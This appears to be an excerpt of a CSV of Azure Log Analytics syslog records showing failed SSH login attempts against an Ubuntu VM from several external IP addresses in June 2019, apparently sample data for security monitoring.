+5610,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:27:10,UbuntuDevEnv,2019-06-26 16:27:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,35921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5611,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:27:11,UbuntuDevEnv,2019-06-26 16:27:11,auth,UbuntuDevEnv,info,Failed password for invalid user tom from 66.70.130.155 port 54976 ssh2,35921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tom,66.70.130.1,54976,,
+5612,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:27:11,UbuntuDevEnv,2019-06-26 16:27:11,auth,UbuntuDevEnv,info,Disconnected from invalid user tom 66.70.130.155 port 54976 [preauth],35921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tom,66.70.130.1,54976,,
+5613,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:27:11,UbuntuDevEnv,2019-06-26 16:27:11,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 54976:11: Bye Bye [preauth],35921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,54976,,
+5614,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:27:21,UbuntuDevEnv,2019-06-26 16:27:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,35965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5615,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:27:23,UbuntuDevEnv,2019-06-26 16:27:22,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 57548 ssh2,35965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,57548,,
+5616,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:27:23,UbuntuDevEnv,2019-06-26 16:27:22,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 57548 [preauth],35965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,57548,,
+5617,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:27:23,UbuntuDevEnv,2019-06-26 16:27:22,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 57548:11: Normal Shutdown, Thank you for playing [preauth]",35965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,57548,,
+5618,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:27:53,UbuntuDevEnv,2019-06-26 16:27:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,36080,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5619,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:27:55,UbuntuDevEnv,2019-06-26 16:27:54,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 60838 ssh2,36080,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,60838,,
+5620,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:27:55,UbuntuDevEnv,2019-06-26 16:27:54,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 60838:11: Normal Shutdown, Thank you for playing [preauth]",36080,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,60838,,
+5621,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:27:55,UbuntuDevEnv,2019-06-26 16:27:54,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 60838 [preauth],36080,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,60838,,
+5622,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:12,UbuntuDevEnv,2019-06-26 16:28:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.59.113.183  user=test,36145,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,119.59.113.1,,0,
+5623,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:14,UbuntuDevEnv,2019-06-26 16:28:14,auth,UbuntuDevEnv,info,Failed password for test from 119.59.113.183 port 50742 ssh2,36145,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,50742,,
+5624,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:15,UbuntuDevEnv,2019-06-26 16:28:14,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 119.59.113.183 port 50742 [preauth],36145,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,119.59.113.1,50742,,
+5625,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:15,UbuntuDevEnv,2019-06-26 16:28:14,auth,UbuntuDevEnv,info,Received disconnect from 119.59.113.183 port 50742:11: Bye Bye [preauth],36145,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,50742,,
+5626,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:18,UbuntuDevEnv,2019-06-26 16:28:18,auth,UbuntuDevEnv,info,Invalid user ramonovh from 171.8.199.77 port 52882,36170,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ramonovh,171.8.199.7,52882,,
+5627,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:18,UbuntuDevEnv,2019-06-26 16:28:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36170,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5628,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:18,UbuntuDevEnv,2019-06-26 16:28:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=171.8.199.77,36170,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,,0,
+5629,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:21,UbuntuDevEnv,2019-06-26 16:28:20,auth,UbuntuDevEnv,info,Failed password for invalid user ramonovh from 171.8.199.77 port 52882 ssh2,36170,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ramonovh,171.8.199.7,52882,,
+5630,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:21,UbuntuDevEnv,2019-06-26 16:28:20,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 52882:11: Bye Bye [preauth],36170,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,52882,,
+5631,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:21,UbuntuDevEnv,2019-06-26 16:28:20,auth,UbuntuDevEnv,info,Disconnected from invalid user ramonovh 171.8.199.77 port 52882 [preauth],36170,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ramonovh,171.8.199.7,52882,,
+5632,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:24,UbuntuDevEnv,2019-06-26 16:28:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,36201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5633,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:27,UbuntuDevEnv,2019-06-26 16:28:26,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 35868 ssh2,36201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,35868,,
+5634,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:27,UbuntuDevEnv,2019-06-26 16:28:26,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 35868:11: Normal Shutdown, Thank you for playing [preauth]",36201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,35868,,
+5635,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:27,UbuntuDevEnv,2019-06-26 16:28:26,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 35868 [preauth],36201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,35868,,
+5636,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:31,UbuntuDevEnv,2019-06-26 16:28:30,auth,UbuntuDevEnv,info,Invalid user benjamin from 119.59.113.183 port 52212,36212,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,benjamin,119.59.113.1,52212,,
+5637,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:31,UbuntuDevEnv,2019-06-26 16:28:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36212,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5638,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:31,UbuntuDevEnv,2019-06-26 16:28:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.59.113.183,36212,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.59.113.1,,0,
+5639,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:33,UbuntuDevEnv,2019-06-26 16:28:33,auth,UbuntuDevEnv,info,Failed password for invalid user benjamin from 119.59.113.183 port 52212 ssh2,36212,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,benjamin,119.59.113.1,52212,,
+5640,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:34,UbuntuDevEnv,2019-06-26 16:28:33,auth,UbuntuDevEnv,info,Received disconnect from 119.59.113.183 port 52212:11: Bye Bye [preauth],36212,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,52212,,
+5641,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:34,UbuntuDevEnv,2019-06-26 16:28:33,auth,UbuntuDevEnv,info,Disconnected from invalid user benjamin 119.59.113.183 port 52212 [preauth],36212,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,benjamin,119.59.113.1,52212,,
+5642,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:38,UbuntuDevEnv,2019-06-26 16:28:37,auth,UbuntuDevEnv,info,Invalid user user from 119.59.113.183 port 52544,36244,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,119.59.113.1,52544,,
+5643,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:38,UbuntuDevEnv,2019-06-26 16:28:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36244,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5644,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:38,UbuntuDevEnv,2019-06-26 16:28:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.59.113.183,36244,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.59.113.1,,0,
+5645,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:40,UbuntuDevEnv,2019-06-26 16:28:40,auth,UbuntuDevEnv,info,Failed password for invalid user user from 119.59.113.183 port 52544 ssh2,36244,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,119.59.113.1,52544,,
+5646,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:40,UbuntuDevEnv,2019-06-26 16:28:40,auth,UbuntuDevEnv,info,Disconnected from invalid user user 119.59.113.183 port 52544 [preauth],36244,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,119.59.113.1,52544,,
+5647,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:40,UbuntuDevEnv,2019-06-26 16:28:40,auth,UbuntuDevEnv,info,Received disconnect from 119.59.113.183 port 52544:11: Bye Bye [preauth],36244,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,52544,,
+5648,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:44,UbuntuDevEnv,2019-06-26 16:28:44,auth,UbuntuDevEnv,info,Invalid user mc from 119.59.113.183 port 52876,36262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mc,119.59.113.1,52876,,
+5649,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:44,UbuntuDevEnv,2019-06-26 16:28:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5650,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:44,UbuntuDevEnv,2019-06-26 16:28:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.59.113.183,36262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.59.113.1,,0,
+5651,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:47,UbuntuDevEnv,2019-06-26 16:28:46,auth,UbuntuDevEnv,info,Failed password for invalid user mc from 119.59.113.183 port 52876 ssh2,36262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mc,119.59.113.1,52876,,
+5652,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:47,UbuntuDevEnv,2019-06-26 16:28:47,auth,UbuntuDevEnv,info,Received disconnect from 119.59.113.183 port 52876:11: Bye Bye [preauth],36262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,52876,,
+5653,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:47,UbuntuDevEnv,2019-06-26 16:28:47,auth,UbuntuDevEnv,info,Disconnected from invalid user mc 119.59.113.183 port 52876 [preauth],36262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mc,119.59.113.1,52876,,
+5654,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:52,UbuntuDevEnv,2019-06-26 16:28:52,auth,UbuntuDevEnv,info,Invalid user rizal from 119.59.113.183 port 53210,36301,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rizal,119.59.113.1,53210,,
+5655,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:52,UbuntuDevEnv,2019-06-26 16:28:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.59.113.183,36301,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.59.113.1,,0,
+5656,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:52,UbuntuDevEnv,2019-06-26 16:28:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36301,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5657,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:54,UbuntuDevEnv,2019-06-26 16:28:54,auth,UbuntuDevEnv,info,Failed password for invalid user rizal from 119.59.113.183 port 53210 ssh2,36301,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rizal,119.59.113.1,53210,,
+5658,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:55,UbuntuDevEnv,2019-06-26 16:28:54,auth,UbuntuDevEnv,info,Received disconnect from 119.59.113.183 port 53210:11: Bye Bye [preauth],36301,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,53210,,
+5659,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:55,UbuntuDevEnv,2019-06-26 16:28:54,auth,UbuntuDevEnv,info,Disconnected from invalid user rizal 119.59.113.183 port 53210 [preauth],36301,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rizal,119.59.113.1,53210,,
+5660,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:56,UbuntuDevEnv,2019-06-26 16:28:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,36317,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5661,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:59,UbuntuDevEnv,2019-06-26 16:28:58,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 39176 ssh2,36317,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,39176,,
+5662,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:59,UbuntuDevEnv,2019-06-26 16:28:58,auth,UbuntuDevEnv,info,Invalid user zhan from 119.59.113.183 port 53538,36321,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhan,119.59.113.1,53538,,
+5663,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:59,UbuntuDevEnv,2019-06-26 16:28:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.59.113.183,36321,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.59.113.1,,0,
+5664,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:59,UbuntuDevEnv,2019-06-26 16:28:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36321,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5665,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:59,UbuntuDevEnv,2019-06-26 16:28:58,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 39176 [preauth],36317,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,39176,,
+5666,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:28:59,UbuntuDevEnv,2019-06-26 16:28:58,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 39176:11: Normal Shutdown, Thank you for playing [preauth]",36317,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,39176,,
+5667,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:01,UbuntuDevEnv,2019-06-26 16:29:00,auth,UbuntuDevEnv,info,Failed password for invalid user zhan from 119.59.113.183 port 53538 ssh2,36321,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhan,119.59.113.1,53538,,
+5668,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:29:01,UbuntuDevEnv,2019-06-26 16:29:01,auth,UbuntuDevEnv,info,Received disconnect from 119.59.113.183 port 53538:11: Bye Bye [preauth],36321,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,53538,,
